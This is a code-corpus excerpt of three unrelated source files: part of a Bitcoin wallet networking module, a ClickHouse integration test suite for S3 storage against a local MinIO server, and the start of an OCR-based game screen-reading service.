else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // CHUNK_SIZE)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except (socket.error, OSError) as e:
print_error('[wait_on_sockets]', e)
return
# TODO: py3, get code from e
# code = None
# if code == errno.EINTR:
# return
# raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
pass
# b = self.blockchains[0]
# if b.get_hash(0) == bitcoin.GENESIS:
# self.downloading_headers = False
# return
# filename = b.path()
# def download_thread():
# try:
# import urllib.request, socket
# socket.setdefaulttimeout(30)
# self.print_error("downloading ", bitcoin.HEADERS_URL)
# urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
# os.rename(filename + '.tmp', filename)
# self.print_error("done.")
# except Exception:
# self.print_error("download failed. creating file", filename)
# # open(filename, 'wb+').close()
# b = self.blockchains[0]
# with b.lock: b.update_size()
# self.downloading_headers = False
# self.downloading_headers = True
# t = threading.Thread(target = download_thread)
# t.daemon = True
# t.start()
def run(self):
# self.init_headers_file()
#
# while self.is_running() and self.downloading_headers:
# time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
self.notify('updated')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain == b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
self.blockchain().update_size()
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
pytest.param("''", id="1_argument"),
pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
for attempt in range(10):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == 9:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500000,500000"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
|
game_service.py
|
from abc import ABC, abstractmethod
import threading
import pytesseract
from PIL import ImageGrab
import cv2
from imposters_mark.services.screen_service import ScreenService
from imposters_mark.entities.stats import Stats
from imposters_mark.entities.player import Player
class _PytesseractHelper(object):
def __init__(self, pytesseract_cmd: str):
pytesseract.pytesseract.tesseract_cmd = pytesseract_cmd
# noinspection PyMethodMayBeStatic
def frame_to_string(self, bbox=None) -> str:
frame = ImageGrab.grab(bbox)
string = pytesseract.image_to_string(frame)
return string.strip()
# noinspection PyMethodMayBeStatic
def frame_to_data(self, bbox=None) -> list:
frame = ImageGrab.grab(bbox)
content = pytesseract.image_to_data(frame)
lines = content.splitlines()[1:]
data = []
for line in lines:
line_data = line.split()
if len(line_data) == 11:
continue
data.append({
'level': line_data[0],
'page_num': line_data[1],
'block_num': line_data[2],
'par_num': line_data[3],
'line_num': line_data[4],
'word_num': line_data[5],
'left': line_data[6],
'top': line_data[7],
'width': line_data[8],
'height': line_data[9],
'conf': line_data[10],
'text': line_data[11]})
return data
class IGameService(ABC):
@abstractmethod
def update(self):
pass
class GameService(IGameService):
def __init__(self, screen_service: ScreenService, pytesseract_cmd: str):
self.screen_service = screen_service
self.pytesseract_helper = _PytesseractHelper(pytesseract_cmd)
self.stats = Stats()
def update(self):
frame = self.screen_service.get_frame()
update_location = threading.Thread(target=self.__update_location, args=(frame,))
update_location.start()
update_players = threading.Thread(target=self.__update_players)
update_players.start()
self.__update_thread_count_text(frame)
self.__update_location_text(frame, 3)
self.__update_current_location_text(frame)
self.__update_players_text(frame, 3)
self.__update_players_rect(frame)
return frame
def __update_location(self, frame):
self.stats.thread_count += 1
frame_height, frame_width, _ = frame.shape
bbox = (
int(frame_width / 4),
frame_height - 100,
int(frame_width / 2 + frame_width / 4),
frame_height - 25)
location = self.pytesseract_helper.frame_to_string(bbox=bbox)
self.stats.append_location(location)
self.stats.thread_count -= 1
def __update_thread_count_text(self, frame):
frame_height, frame_width, _ = frame.shape
thread_count = f'Active Threads: {str(self.stats.thread_count)}'
position = (10, frame_height - 10)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, thread_count, position, font, font_scale, font_color, font_thickness)
def __update_location_text(self, frame, count: int):
frame_height, frame_width, _ = frame.shape
location = f'Locations: {self.stats.get_last_locations(count)}'
position = (10, frame_height - 60)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, location, position, font, font_scale, font_color, font_thickness)
def __update_current_location_text(self, frame):
frame_height, frame_width, _ = frame.shape
current_location = f'Current Location: {self.stats.get_current_location()}'
position = (10, frame_height - 110)
font = cv2.QT_FONT_NORMAL
font_scale = 1
font_color = (0, 0, 255)
font_thickness = 3
cv2.putText(frame, current_location, position, font, font_scale, font_color, font_thickness)
def __update_players(self):
self.stats.thread_count += 1
data = self.pytesseract_helper.frame_to_data()
for entry in data:
player = Player()
player.name = entry['text']
player.position = (
int(entry['left']),
